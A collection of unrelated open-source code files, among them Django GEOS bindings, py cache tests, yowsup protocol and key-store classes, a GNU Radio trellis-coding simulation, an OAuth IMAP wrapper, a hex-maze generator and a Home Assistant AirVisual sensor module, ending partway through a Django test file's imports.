        if validate_textctrl_str(self.y1_textctrl, int, self.last_string_values['y1']):
            self.last_string_values['y1'] = self.y1_textctrl.GetValue()
            self.update_stats_box(None, None, None, int(self.last_string_values['y1']))
            self.y1_textctrl.SetSelection(-1, -1)
            self.redraw_overplot_on_image()
| mit |
shacker/django | django/contrib/gis/geos/prototypes/__init__.py | 67 | 1221 | """
This module contains all of the GEOS ctypes function prototypes. Each
prototype handles the interaction between the GEOS library and Python
via ctypes.
"""
from django.contrib.gis.geos.prototypes.coordseq import ( # NOQA
create_cs, cs_clone, cs_getdims, cs_getordinate, cs_getsize, cs_getx,
cs_gety, cs_getz, cs_setordinate, cs_setx, cs_sety, cs_setz, get_cs,
)
from django.contrib.gis.geos.prototypes.geom import ( # NOQA
create_collection, create_empty_polygon, create_linearring,
create_linestring, create_point, create_polygon, destroy_geom, geom_clone,
geos_get_srid, geos_normalize, geos_set_srid, geos_type, geos_typeid,
get_dims, get_extring, get_geomn, get_intring, get_nrings, get_num_coords,
get_num_geoms,
)
from django.contrib.gis.geos.prototypes.misc import * # NOQA
from django.contrib.gis.geos.prototypes.predicates import ( # NOQA
geos_contains, geos_covers, geos_crosses, geos_disjoint, geos_equals,
geos_equalsexact, geos_hasz, geos_intersects, geos_isclosed, geos_isempty,
geos_isring, geos_issimple, geos_isvalid, geos_overlaps,
geos_relatepattern, geos_touches, geos_within,
)
from django.contrib.gis.geos.prototypes.topology import * # NOQA
| bsd-3-clause |
tictakk/servo | tests/wpt/web-platform-tests/tools/py/testing/path/test_cacheutil.py | 163 | 2949 | import py
from py._path import cacheutil
class BasicCacheAPITest:
    """Shared API tests run against whichever cache the subclass supplies."""
    # subclasses override with a concrete cache instance
    cache = None

    def test_getorbuild(self):
        # first call builds the value; second call must return the cached
        # value and ignore the new builder
        val = self.cache.getorbuild(-42, lambda: 42)
        assert val == 42
        val = self.cache.getorbuild(-42, lambda: 23)
        assert val == 42

    def test_cache_get_key_error(self):
        # looking up a key that was never built raises KeyError
        py.test.raises(KeyError, "self.cache._getentry(-23)")

    def test_delentry_non_raising(self):
        # deleting an existing entry removes it without raising
        val = self.cache.getorbuild(100, lambda: 100)
        self.cache.delentry(100)
        py.test.raises(KeyError, "self.cache._getentry(100)")

    def test_delentry_raising(self):
        # with raising=True, deleting a missing entry raises KeyError
        val = self.cache.getorbuild(100, lambda: 100)
        self.cache.delentry(100)
        py.test.raises(KeyError, "self.cache.delentry(100, raising=True)")

    def test_clear(self):
        # clear() must succeed on any cache state
        self.cache.clear()
class TestBuildcostAccess(BasicCacheAPITest):
    """Exercise BuildcostAccessCache: eviction prefers entries that are
    cheap to rebuild and rarely accessed."""
    cache = cacheutil.BuildcostAccessCache(maxentries=128)

    def test_cache_works_somewhat_simple(self, monkeypatch):
        cache = cacheutil.BuildcostAccessCache()
        # the default gettime
        # BuildcostAccessCache.build can
        # result into time()-time() == 0 which makes the below
        # test fail randomly. Let's rather use incrementing
        # numbers instead.
        l = [0]
        def counter():
            # monotonically increasing fake clock
            l[0] = l[0] + 1
            return l[0]
        monkeypatch.setattr(cacheutil, 'gettime', counter)
        # fill the cache to capacity
        for x in range(cache.maxentries):
            y = cache.getorbuild(x, lambda: x)
            assert x == y
        # every entry must still be retrievable (builder None proves no rebuild)
        for x in range(cache.maxentries):
            assert cache.getorbuild(x, None) == x
        # access the first half again to raise their access counts
        halfentries = int(cache.maxentries / 2)
        for x in range(halfentries):
            assert cache.getorbuild(x, None) == x
            assert cache.getorbuild(x, None) == x
        # evict one entry
        val = cache.getorbuild(-1, lambda: 42)
        assert val == 42
        # check that recently used ones are still there
        # and are not build again
        for x in range(halfentries):
            assert cache.getorbuild(x, None) == x
        assert cache.getorbuild(-1, None) == 42
class TestAging(BasicCacheAPITest):
    """Exercise AgingCache: entries expire after maxseconds."""
    maxsecs = 0.10
    cache = cacheutil.AgingCache(maxentries=128, maxseconds=maxsecs)

    def test_cache_eviction(self):
        self.cache.getorbuild(17, lambda: 17)
        # poll for up to 10x the TTL waiting for the entry to expire
        endtime = py.std.time.time() + self.maxsecs * 10
        while py.std.time.time() < endtime:
            try:
                self.cache._getentry(17)
            except KeyError:
                # entry expired as expected
                break
            py.std.time.sleep(self.maxsecs*0.3)
        else:
            # loop ran to completion without the entry ever expiring
            py.test.fail("waiting for cache eviction failed")
def test_prune_lowestweight():
    """An AgingCache insert after the TTL has elapsed must prune the
    expired (lowest-weight) entries without error."""
    ttl = 0.05
    cache = cacheutil.AgingCache(maxentries=10, maxseconds=ttl)
    # fill the cache to capacity
    for key in range(cache.maxentries):
        cache.getorbuild(key, lambda key=key: key)
    # let every entry age past its TTL, then trigger pruning via an insert
    py.std.time.sleep(ttl * 1.1)
    cache.getorbuild(cache.maxentries + 1, lambda: 42)
| mpl-2.0 |
kenju254/yowsup | yowsup/layers/protocol_contacts/protocolentities/iq_sync.py | 29 | 1903 | from yowsup.structs import ProtocolTreeNode
from yowsup.layers.protocol_iq.protocolentities import IqProtocolEntity
import time
class SyncIqProtocolEntity(IqProtocolEntity):
    '''
    <iq type="get" id="{{id}}" xmlns="urn:xmpp:whatsapp:sync">
        <sync
            sid="{{str((int(time.time()) + 11644477200) * 10000000)}}"
            index="{{0 | ?}}"
            last="{{true | false?}}"
        >
        </sync>
    </iq>
    '''

    def __init__(self, _type, _id = None, sid = None, index = 0, last = True):
        super(SyncIqProtocolEntity, self).__init__("urn:xmpp:whatsapp:sync", _id = _id, _type = _type)
        self.setSyncProps(sid, index, last)

    def setSyncProps(self, sid, index, last):
        """
        Store the sync attributes.

        sid defaults to the current time expressed as a Windows FILETIME-style
        value (seconds since 1601 epoch, in 100ns units).
        `last` may arrive as a bool or as the raw attribute string
        "true"/"false" (as passed by fromProtocolTreeNode).
        """
        self.sid = sid if sid else str((int(time.time()) + 11644477200) * 10000000)
        self.index = int(index)
        # Bug fix: fromProtocolTreeNode passes the raw attribute string;
        # previously the non-empty string "false" was stored as-is, which is
        # truthy and was re-serialized as "true" by toProtocolTreeNode.
        if isinstance(last, str):
            last = last.lower() == "true"
        self.last = bool(last)

    def __str__(self):
        out = super(SyncIqProtocolEntity, self).__str__()
        out += "sid: %s\n" % self.sid
        out += "index: %s\n" % self.index
        out += "last: %s\n" % self.last
        return out

    def toProtocolTreeNode(self):
        """Serialize back to a ProtocolTreeNode with a child <sync> node."""
        syncNodeAttrs = {
            "sid": self.sid,
            "index": str(self.index),
            "last": "true" if self.last else "false"
        }
        syncNode = ProtocolTreeNode("sync", syncNodeAttrs)
        node = super(SyncIqProtocolEntity, self).toProtocolTreeNode()
        node.addChild(syncNode)
        return node

    @staticmethod
    def fromProtocolTreeNode(node):
        """Build a SyncIqProtocolEntity from a received <iq><sync/></iq> node."""
        syncNode = node.getChild("sync")
        entity = IqProtocolEntity.fromProtocolTreeNode(node)
        entity.__class__ = SyncIqProtocolEntity
        entity.setSyncProps(
            syncNode.getAttributeValue("sid"),
            syncNode.getAttributeValue("index"),
            syncNode.getAttributeValue("last")
        )
        return entity
| gpl-3.0 |
jmmartinez84/yowsup | yowsup/layers/axolotl/store/sqlite/litesignedprekeystore.py | 39 | 2191 | from axolotl.state.signedprekeystore import SignedPreKeyStore
from axolotl.state.signedprekeyrecord import SignedPreKeyRecord
from axolotl.invalidkeyidexception import InvalidKeyIdException
class LiteSignedPreKeyStore(SignedPreKeyStore):
    """Signed-prekey persistence backed by a SQLite connection."""

    def __init__(self, dbConn):
        """
        :type dbConn: Connection
        """
        self.dbConn = dbConn
        # Ensure the backing table exists before any load/store call.
        dbConn.execute("CREATE TABLE IF NOT EXISTS signed_prekeys (_id INTEGER PRIMARY KEY AUTOINCREMENT,"
                       "prekey_id INTEGER UNIQUE, timestamp INTEGER, record BLOB);")

    def loadSignedPreKey(self, signedPreKeyId):
        """Return the stored record for the given id, or raise if absent."""
        cursor = self.dbConn.cursor()
        cursor.execute("SELECT record FROM signed_prekeys WHERE prekey_id = ?", (signedPreKeyId,))
        row = cursor.fetchone()
        if not row:
            raise InvalidKeyIdException("No such signedprekeyrecord! %s " % signedPreKeyId)
        return SignedPreKeyRecord(serialized=row[0])

    def loadSignedPreKeys(self):
        """Return every stored signed-prekey record."""
        cursor = self.dbConn.cursor()
        cursor.execute("SELECT record FROM signed_prekeys")
        return [SignedPreKeyRecord(serialized=row[0]) for row in cursor.fetchall()]

    def storeSignedPreKey(self, signedPreKeyId, signedPreKeyRecord):
        """Persist a serialized signed-prekey record under the given id."""
        cursor = self.dbConn.cursor()
        cursor.execute("INSERT INTO signed_prekeys (prekey_id, record) VALUES(?,?)",
                       (signedPreKeyId, signedPreKeyRecord.serialize()))
        self.dbConn.commit()

    def containsSignedPreKey(self, signedPreKeyId):
        """Return True when a record with the given id exists."""
        cursor = self.dbConn.cursor()
        cursor.execute("SELECT record FROM signed_prekeys WHERE prekey_id = ?", (signedPreKeyId,))
        return cursor.fetchone() is not None

    def removeSignedPreKey(self, signedPreKeyId):
        """Delete the record with the given id, if present."""
        cursor = self.dbConn.cursor()
        cursor.execute("DELETE FROM signed_prekeys WHERE prekey_id = ?", (signedPreKeyId,))
        self.dbConn.commit()
| gpl-3.0 |
mbr0wn/gnuradio | gr-trellis/examples/python/test_tcm.py | 6 | 4861 | #!/usr/bin/env python
from gnuradio import gr
from gnuradio import trellis, digital, blocks
from gnuradio import eng_notation
import math
import sys
import random
from gnuradio.trellis import fsm_utils
from gnuradio.eng_option import eng_option
from optparse import OptionParser
import numpy
try:
from gnuradio import analog
except ImportError:
sys.stderr.write("Error: Program requires gr-analog.\n")
sys.exit(1)
def run_test (f,Kb,bitspersymbol,K,dimensionality,constellation,N0,seed):
    """Run one trellis-coded-modulation simulation over an AWGN channel.

    Builds a TX -> channel -> Viterbi-RX flow graph, runs it to completion,
    and returns (ntotal, nwrong, error_pattern) where error_pattern is the
    per-bit absolute difference between sent and decoded packets.
    """
    tb = gr.top_block ()

    # TX
    # Callers pass a negative seed (see main: -(666+i)); negate it here so
    # numpy gets a non-negative seed.
    numpy.random.seed(-seed)
    packet = numpy.random.randint(0,2,Kb) # create Kb random bits
    packet[Kb-10:Kb]=0
    # NOTE(review): the next line zeroes the ENTIRE packet, overriding the
    # random data generated above -- looks like a debugging leftover; confirm.
    packet[0:Kb]=0
    src = blocks.vector_source_s(packet.tolist(),False)
    b2s = blocks.unpacked_to_packed_ss(1,gr.GR_MSB_FIRST) # pack bits in shorts
    s2fsmi = blocks.packed_to_unpacked_ss(bitspersymbol,gr.GR_MSB_FIRST) # unpack shorts to symbols compatible with the FSM input cardinality
    enc = trellis.encoder_ss(f,0) # initial state = 0
    mod = digital.chunks_to_symbols_sf(constellation,dimensionality)

    # CHANNEL: additive Gaussian noise with variance N0/2 per dimension.
    add = blocks.add_ff()
    noise = analog.noise_source_f(analog.GR_GAUSSIAN,math.sqrt(N0 / 2),int(seed))

    # RX
    va = trellis.viterbi_combined_fs(f,K,0,0,dimensionality,constellation,digital.TRELLIS_EUCLIDEAN) # Put -1 if the Initial/Final states are not set.
    fsmi2s = blocks.unpacked_to_packed_ss(bitspersymbol,gr.GR_MSB_FIRST) # pack FSM input symbols to shorts
    s2b = blocks.packed_to_unpacked_ss(1,gr.GR_MSB_FIRST) # unpack shorts to bits
    dst = blocks.vector_sink_s();

    # Wire TX chain, mix in noise, then decode.
    tb.connect (src,b2s,s2fsmi,enc,mod)
    tb.connect (mod,(add,0))
    tb.connect (noise,(add,1))
    tb.connect (add,va,fsmi2s,s2b,dst)

    tb.run()

    # A bit of cheating: run the program once and print the
    # final encoder state..
    # Then put it as the last argument in the viterbi block
    #print "final state = " , enc.ST()

    if len(dst.data()) != len(packet):
        print("Error: not enough data:", len(dst.data()), len(packet))
    ntotal=len(packet)
    nwrong = sum(abs(packet-numpy.array(dst.data())));
    return (ntotal,nwrong,abs(packet-numpy.array(dst.data())))
def main():
    """Parse command-line options and run the TCM bit-error-rate simulation."""
    parser = OptionParser(option_class=eng_option)
    parser.add_option("-f", "--fsm_file", type="string", default="fsm_files/awgn1o2_4.fsm", help="Filename containing the fsm specification, e.g. -f fsm_files/awgn1o2_4.fsm (default=fsm_files/awgn1o2_4.fsm)")
    parser.add_option("-e", "--esn0", type="eng_float", default=10.0, help="Symbol energy to noise PSD level ratio in dB, e.g., -e 10.0 (default=10.0)")
    parser.add_option("-r", "--repetitions", type="int", default=100, help="Number of packets to be generated for the simulation, e.g., -r 100 (default=100)")
    (options, args) = parser.parse_args()
    if len(args) != 0:
        parser.print_help()
        raise SystemExit(1)

    fname = options.fsm_file
    esn0_db = float(options.esn0)
    rep = int(options.repetitions)

    # System parameters.
    f = trellis.fsm(fname)  # get the FSM specification from a file
    # Alternatively you can specify the fsm from its generator matrix:
    # f = trellis.fsm(1, 2, [5, 7])
    Kb = 1024 * 16  # packet size in bits (multiple of 16 so it can be packed in a short)
    bitspersymbol = int(round(math.log(f.I()) / math.log(2)))  # bits per FSM input symbol
    # Use integer division: K is a trellis-step count and must be an int
    # (Kb / bitspersymbol would produce a float under Python 3 division).
    K = Kb // bitspersymbol  # packet size in trellis steps
    modulation = fsm_utils.psk4  # see fsm_utils.py for available predefined modulations
    dimensionality = modulation[0]
    constellation = modulation[1]
    if len(constellation) / dimensionality != f.O():
        sys.stderr.write('Incompatible FSM output cardinality and modulation size.\n')
        sys.exit(1)

    # Calculate average symbol energy.
    Es = 0
    for i in range(len(constellation)):
        Es = Es + constellation[i] ** 2
    Es = Es / (len(constellation) // dimensionality)
    N0 = Es / pow(10.0, esn0_db / 10.0)  # calculate noise variance

    tot_b = 0   # total number of transmitted bits
    terr_b = 0  # total number of bits in error
    terr_p = 0  # total number of packets in error
    for i in range(rep):
        # Run experiment with a different seed to get a different noise realization.
        (b, e, pattern) = run_test(f, Kb, bitspersymbol, K, dimensionality, constellation, N0, -(666 + i))
        tot_b = tot_b + b
        terr_b = terr_b + e
        terr_p = terr_p + (e != 0)
        if ((i + 1) % 100 == 0):  # display progress
            print(i + 1, terr_p, '%.2e' % ((1.0 * terr_p) / (i + 1)), tot_b, terr_b, '%.2e' % ((1.0 * terr_b) / tot_b))
        if e != 0:
            print("rep=", i, e)
            for k in range(Kb):
                if pattern[k] != 0:
                    print(k)
    # Final estimate of the packet/bit error rates.  Use `rep` instead of the
    # leaked loop variable `i` (which is undefined when rep == 0).
    print(rep, terr_p, '%.2e' % ((1.0 * terr_p) / rep), tot_b, terr_b, '%.2e' % ((1.0 * terr_b) / tot_b))
# Run the simulation only when executed as a script, not when imported.
if __name__ == '__main__':
    main()
| gpl-3.0 |
CyanogenMod/android_external_chromium | chrome/common/extensions/docs/examples/apps/hello-python/oauth2/clients/imap.py | 885 | 1685 | """
The MIT License
Copyright (c) 2007-2010 Leah Culver, Joe Stump, Mark Paschal, Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import oauth2
import imaplib
class IMAP4_SSL(imaplib.IMAP4_SSL):
    """IMAP wrapper for imaplib.IMAP4_SSL that implements XOAUTH."""

    def authenticate(self, url, consumer, token):
        """Authenticate against the server with the XOAUTH mechanism.

        *consumer* and *token* must be oauth2.Consumer / oauth2.Token
        instances (or None); raises ValueError otherwise.
        """
        if consumer is not None and not isinstance(consumer, oauth2.Consumer):
            raise ValueError("Invalid consumer.")
        if token is not None and not isinstance(token, oauth2.Token):
            raise ValueError("Invalid token.")

        def xoauth_response(challenge):
            # imaplib hands us the server challenge, which XOAUTH ignores;
            # the response is always the signed XOAUTH string.
            return oauth2.build_xoauth_string(url, consumer, token)

        imaplib.IMAP4_SSL.authenticate(self, 'XOAUTH', xoauth_response)
| bsd-3-clause |
bitcraft/pyweek19 | zort/environ/maze.py | 1 | 2942 | from heapq import heappush, heappop
import itertools
import random
from zort.hex_model import HexMapModel, Cell, evenr_to_axial
from zort.environ import util
def build_maze_from_hex(model, lower_limit=None, upper_limit=None,
                        height=1.0,
                        raised_tile='tileRock_full.png',
                        lowered_tile='tileGrass.png',
                        num_adjacent=1,
                        start_raised=True,
                        closed_set=None):
    """Carve a maze into *model* by lowering cells along a random walk.

    Starting from a random cell inside the limits, repeatedly lowers an
    available neighbour (one with at most *num_adjacent* already-carved
    neighbours), backtracking via the open set when stuck.

    Parameters:
        model: HexMapModel whose cells are raised/lowered in place.
        lower_limit/upper_limit: inclusive (x, y) bounds of the carving
            area; default to a 1-cell border inside the model.
        height: height assigned to raised cells.
        raised_tile/lowered_tile: tile image filenames for each state.
        num_adjacent: max carved neighbours an open cell may already have.
        start_raised: when True, raise every cell not in closed_set first.
        closed_set: set of already-carved coords.  BUG FIX: this was a
            mutable default argument (``set()``), so carved coordinates
            leaked between calls and a second maze saw the first maze's
            cells as closed.  A fresh set is now created per call.
    """
    if closed_set is None:
        closed_set = set()

    def available_neighbors(coord):
        return [c for c in neighbors(coord) if coord_available(c)]

    def coord_available(coord):
        return coord not in closed_set and \
            len(closed_neighbors(coord)) <= num_adjacent

    def closed_neighbors(coord):
        # Carved (closed) neighbours of coord, excluding the current cell.
        # (The original wrote ``{current, current}``; a one-element set is
        # equivalent.)
        return (set(neighbors(coord)) - {current}) & closed_set

    def neighbors(coord):
        return surrounding(coord)

    def raise_cell(cell):
        cell.raised = True
        cell.height = height
        cell.filename = raised_tile

    def lower_cell(cell):
        cell.raised = False
        cell.height = 0.0
        cell.filename = lowered_tile

    if start_raised:
        # Set all cells to raised
        for cell in model.cells:
            if cell[0] not in closed_set:
                raise_cell(cell[1])

    # Despite the historical name, this is a plain set used for backtracking.
    open_heap = set()

    if lower_limit is None:
        lower_limit = (1, 1)
    if upper_limit is None:
        upper_limit = (model.width - 2, model.height - 2)

    start = (random.randint(lower_limit[0], upper_limit[0]),
             random.randint(lower_limit[1], upper_limit[1]))
    surrounding = util.surrounding(lower_limit, upper_limit)

    current = start
    open_heap.add(start)
    closed_set.add(start)
    lower_cell(model.get_cell(evenr_to_axial(start)))
    open_neighbors = available_neighbors(start)

    while open_heap or open_neighbors:
        try:
            # Advance the walk into a random available neighbour.
            current = random.choice(open_neighbors)
            open_heap.add(current)
            closed_set.add(current)
            lower_cell(model.get_cell(evenr_to_axial(current)))
        except IndexError:
            # Dead end: backtrack to an arbitrary previously opened cell.
            current = open_heap.pop()
        open_neighbors = available_neighbors(current)
    return
def new_maze(map_width=10,
             map_height=10,
             tile_height=1.0,
             raised_tile='tileRock_full.png',
             lowered_tile='tileGrass.png',
             num_adjacent=1):
    """Build a fresh HexMapModel of lowered cells and carve a maze into it.

    Returns the populated model.
    """
    model = HexMapModel()
    # Populate every (column, row) position with a lowered cell.
    for column in range(map_width):
        for row in range(map_height):
            cell = Cell()
            cell.filename = lowered_tile
            model.add_cell(evenr_to_axial((column, row)), cell)

    # Carve inside a one-cell border so the maze keeps a solid outer wall.
    build_maze_from_hex(
        model,
        lower_limit=(1, 1),
        upper_limit=(model.width - 2, model.height - 2),
        height=tile_height,
        raised_tile=raised_tile,
        lowered_tile=lowered_tile,
        num_adjacent=num_adjacent)
    return model
| bsd-2-clause |
nkgilley/home-assistant | homeassistant/components/airvisual/sensor.py | 6 | 9168 | """Support for AirVisual air quality sensors."""
from logging import getLogger
from homeassistant.const import (
ATTR_LATITUDE,
ATTR_LONGITUDE,
ATTR_STATE,
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_SHOW_ON_MAP,
CONF_STATE,
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_TEMPERATURE,
TEMP_CELSIUS,
UNIT_PERCENTAGE,
)
from homeassistant.core import callback
from . import AirVisualEntity
from .const import (
CONF_CITY,
CONF_COUNTRY,
CONF_INTEGRATION_TYPE,
DATA_COORDINATOR,
DOMAIN,
INTEGRATION_TYPE_GEOGRAPHY,
)
_LOGGER = getLogger(__name__)

# Extra state-attribute keys exposed by the geography sensors.
ATTR_CITY = "city"
ATTR_COUNTRY = "country"
ATTR_POLLUTANT_SYMBOL = "pollutant_symbol"
ATTR_POLLUTANT_UNIT = "pollutant_unit"
ATTR_REGION = "region"

# Concentration unit strings.
MASS_PARTS_PER_MILLION = "ppm"
MASS_PARTS_PER_BILLION = "ppb"
VOLUME_MICROGRAMS_PER_CUBIC_METER = "µg/m3"

# Sensor "kind" identifiers used to select per-entity update behavior.
SENSOR_KIND_LEVEL = "air_pollution_level"
SENSOR_KIND_AQI = "air_quality_index"
SENSOR_KIND_POLLUTANT = "main_pollutant"
SENSOR_KIND_BATTERY_LEVEL = "battery_level"
SENSOR_KIND_HUMIDITY = "humidity"
SENSOR_KIND_TEMPERATURE = "temperature"

# (kind, name, icon, unit) tuples for the cloud-API geography sensors.
GEOGRAPHY_SENSORS = [
    (SENSOR_KIND_LEVEL, "Air Pollution Level", "mdi:gauge", None),
    (SENSOR_KIND_AQI, "Air Quality Index", "mdi:chart-line", "AQI"),
    (SENSOR_KIND_POLLUTANT, "Main Pollutant", "mdi:chemical-weapon", None),
]
# AQI standard locales: each geography sensor is created once per locale.
GEOGRAPHY_SENSOR_LOCALES = {"cn": "Chinese", "us": "U.S."}

# (kind, name, device_class, unit) tuples for Node/Pro hardware sensors.
NODE_PRO_SENSORS = [
    (SENSOR_KIND_BATTERY_LEVEL, "Battery", DEVICE_CLASS_BATTERY, UNIT_PERCENTAGE),
    (SENSOR_KIND_HUMIDITY, "Humidity", DEVICE_CLASS_HUMIDITY, UNIT_PERCENTAGE),
    (SENSOR_KIND_TEMPERATURE, "Temperature", DEVICE_CLASS_TEMPERATURE, TEMP_CELSIUS),
]

# Inclusive AQI ranges mapped to human-readable labels and icons.
POLLUTANT_LEVEL_MAPPING = [
    {"label": "Good", "icon": "mdi:emoticon-excited", "minimum": 0, "maximum": 50},
    {"label": "Moderate", "icon": "mdi:emoticon-happy", "minimum": 51, "maximum": 100},
    {
        "label": "Unhealthy for sensitive groups",
        "icon": "mdi:emoticon-neutral",
        "minimum": 101,
        "maximum": 150,
    },
    {"label": "Unhealthy", "icon": "mdi:emoticon-sad", "minimum": 151, "maximum": 200},
    {
        "label": "Very Unhealthy",
        "icon": "mdi:emoticon-dead",
        "minimum": 201,
        "maximum": 300,
    },
    {"label": "Hazardous", "icon": "mdi:biohazard", "minimum": 301, "maximum": 10000},
]

# API pollutant symbol -> display label and measurement unit.
POLLUTANT_MAPPING = {
    "co": {"label": "Carbon Monoxide", "unit": CONCENTRATION_PARTS_PER_MILLION},
    "n2": {"label": "Nitrogen Dioxide", "unit": CONCENTRATION_PARTS_PER_BILLION},
    "o3": {"label": "Ozone", "unit": CONCENTRATION_PARTS_PER_BILLION},
    "p1": {"label": "PM10", "unit": CONCENTRATION_MICROGRAMS_PER_CUBIC_METER},
    "p2": {"label": "PM2.5", "unit": CONCENTRATION_MICROGRAMS_PER_CUBIC_METER},
    "s2": {"label": "Sulfur Dioxide", "unit": CONCENTRATION_PARTS_PER_BILLION},
}
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Set up AirVisual sensors based on a config entry."""
    coordinator = hass.data[DOMAIN][DATA_COORDINATOR][config_entry.entry_id]

    sensors = []
    if config_entry.data[CONF_INTEGRATION_TYPE] == INTEGRATION_TYPE_GEOGRAPHY:
        # One geography sensor per (locale, sensor description) pair.
        for locale in GEOGRAPHY_SENSOR_LOCALES:
            for kind, name, icon, unit in GEOGRAPHY_SENSORS:
                sensors.append(
                    AirVisualGeographySensor(
                        coordinator, config_entry, kind, name, icon, unit, locale
                    )
                )
    else:
        # Node/Pro hardware unit: one sensor per measurement description.
        for kind, name, device_class, unit in NODE_PRO_SENSORS:
            sensors.append(
                AirVisualNodeProSensor(coordinator, kind, name, device_class, unit)
            )

    async_add_entities(sensors, True)
class AirVisualGeographySensor(AirVisualEntity):
    """Define an AirVisual sensor related to geography data via the Cloud API."""

    def __init__(self, coordinator, config_entry, kind, name, icon, unit, locale):
        """Initialize.

        kind: one of the SENSOR_KIND_* geography identifiers.
        locale: AQI standard key from GEOGRAPHY_SENSOR_LOCALES ("cn"/"us").
        """
        super().__init__(coordinator)

        # Static location attributes come from the config entry, not the API.
        self._attrs.update(
            {
                ATTR_CITY: config_entry.data.get(CONF_CITY),
                ATTR_STATE: config_entry.data.get(CONF_STATE),
                ATTR_COUNTRY: config_entry.data.get(CONF_COUNTRY),
            }
        )
        self._config_entry = config_entry
        self._icon = icon
        self._kind = kind
        self._locale = locale
        self._name = name
        self._state = None
        self._unit = unit

    @property
    def available(self):
        """Return True if entity is available."""
        try:
            # Available only when the last refresh succeeded AND the payload
            # actually contains pollution data.
            return self.coordinator.last_update_success and bool(
                self.coordinator.data["current"]["pollution"]
            )
        except KeyError:
            return False

    @property
    def name(self):
        """Return the name."""
        return f"{GEOGRAPHY_SENSOR_LOCALES[self._locale]} {self._name}"

    @property
    def state(self):
        """Return the state."""
        return self._state

    @property
    def unique_id(self):
        """Return a unique, Home Assistant friendly identifier for this entity."""
        return f"{self._config_entry.unique_id}_{self._locale}_{self._kind}"

    @callback
    def update_from_latest_data(self):
        """Update the entity from the latest data."""
        try:
            data = self.coordinator.data["current"]["pollution"]
        except KeyError:
            return

        if self._kind == SENSOR_KIND_LEVEL:
            # Map the locale-specific AQI value onto its label/icon bucket;
            # single-element unpacking asserts exactly one range matches.
            aqi = data[f"aqi{self._locale}"]
            [level] = [
                i
                for i in POLLUTANT_LEVEL_MAPPING
                if i["minimum"] <= aqi <= i["maximum"]
            ]
            self._state = level["label"]
            self._icon = level["icon"]
        elif self._kind == SENSOR_KIND_AQI:
            self._state = data[f"aqi{self._locale}"]
        elif self._kind == SENSOR_KIND_POLLUTANT:
            symbol = data[f"main{self._locale}"]
            self._state = POLLUTANT_MAPPING[symbol]["label"]
            self._attrs.update(
                {
                    ATTR_POLLUTANT_SYMBOL: symbol,
                    ATTR_POLLUTANT_UNIT: POLLUTANT_MAPPING[symbol]["unit"],
                }
            )

        if CONF_LATITUDE in self._config_entry.data:
            if self._config_entry.options[CONF_SHOW_ON_MAP]:
                # Standard lat/long keys place the entity on the HA map;
                # remove the non-standard fallbacks if previously set.
                self._attrs[ATTR_LATITUDE] = self._config_entry.data[CONF_LATITUDE]
                self._attrs[ATTR_LONGITUDE] = self._config_entry.data[CONF_LONGITUDE]
                self._attrs.pop("lati", None)
                self._attrs.pop("long", None)
            else:
                # Use non-standard keys so the entity is NOT shown on the map.
                self._attrs["lati"] = self._config_entry.data[CONF_LATITUDE]
                self._attrs["long"] = self._config_entry.data[CONF_LONGITUDE]
                self._attrs.pop(ATTR_LATITUDE, None)
                self._attrs.pop(ATTR_LONGITUDE, None)
class AirVisualNodeProSensor(AirVisualEntity):
    """Define an AirVisual sensor related to a Node/Pro unit."""

    def __init__(self, coordinator, kind, name, device_class, unit):
        """Initialize.

        kind: one of the SENSOR_KIND_* Node/Pro identifiers.
        """
        super().__init__(coordinator)

        self._device_class = device_class
        self._kind = kind
        self._name = name
        self._state = None
        self._unit = unit

    @property
    def device_class(self):
        """Return the device class."""
        return self._device_class

    @property
    def device_info(self):
        """Return device registry information for this entity."""
        return {
            "identifiers": {
                (DOMAIN, self.coordinator.data["current"]["serial_number"])
            },
            "name": self.coordinator.data["current"]["settings"]["node_name"],
            "manufacturer": "AirVisual",
            "model": f'{self.coordinator.data["current"]["status"]["model"]}',
            # NOTE(review): system_version and app_version are concatenated
            # with no separator between the two f-strings -- confirm this is
            # the intended version format.
            "sw_version": (
                f'Version {self.coordinator.data["current"]["status"]["system_version"]}'
                f'{self.coordinator.data["current"]["status"]["app_version"]}'
            ),
        }

    @property
    def name(self):
        """Return the name."""
        node_name = self.coordinator.data["current"]["settings"]["node_name"]
        return f"{node_name} Node/Pro: {self._name}"

    @property
    def state(self):
        """Return the state."""
        return self._state

    @property
    def unique_id(self):
        """Return a unique, Home Assistant friendly identifier for this entity."""
        return f"{self.coordinator.data['current']['serial_number']}_{self._kind}"

    @callback
    def update_from_latest_data(self):
        """Update the entity from the latest data."""
        if self._kind == SENSOR_KIND_BATTERY_LEVEL:
            self._state = self.coordinator.data["current"]["status"]["battery"]
        elif self._kind == SENSOR_KIND_HUMIDITY:
            # .get(): measurement may be absent from the payload.
            self._state = self.coordinator.data["current"]["measurements"].get(
                "humidity"
            )
        elif self._kind == SENSOR_KIND_TEMPERATURE:
            self._state = self.coordinator.data["current"]["measurements"].get(
                "temperature_C"
            )
| apache-2.0 |
whs/django | tests/httpwrappers/tests.py | 1 | 30662 | import copy
import json
import os
import pickle
import unittest
import uuid
from django.core.exceptions import DisallowedRedirect
from django.core.serializers.json import DjangoJSONEncoder
from django.core.signals import request_finished
from django.db import close_old_connections
from django.http import (
BadHeaderError, HttpResponse, HttpResponseNotAllowed,
HttpResponseNotModified, HttpResponsePermanentRedirect,
